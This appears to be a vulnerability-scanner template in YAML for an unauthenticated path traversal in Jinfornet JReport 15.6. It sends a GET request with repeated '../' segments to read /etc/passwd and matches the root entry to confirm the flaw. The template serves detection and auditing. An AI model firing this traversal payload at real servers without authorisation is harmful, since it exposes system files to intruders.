28 lines
881 B
YAML
28 lines
881 B
YAML
|
id: jinfornet-jreport-lfi
|
||
|
|
||
|
info:
|
||
|
name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
|
||
|
reference:
|
||
|
- https://cxsecurity.com/issue/WLB-2020030151
|
||
|
- https://www.jinfonet.com/product/download-jreport/
|
||
|
tags: jreport,jinfornet,lfi
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
part: body
|
||
|
regex:
|
||
|
- "root:[x*]:0:0"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|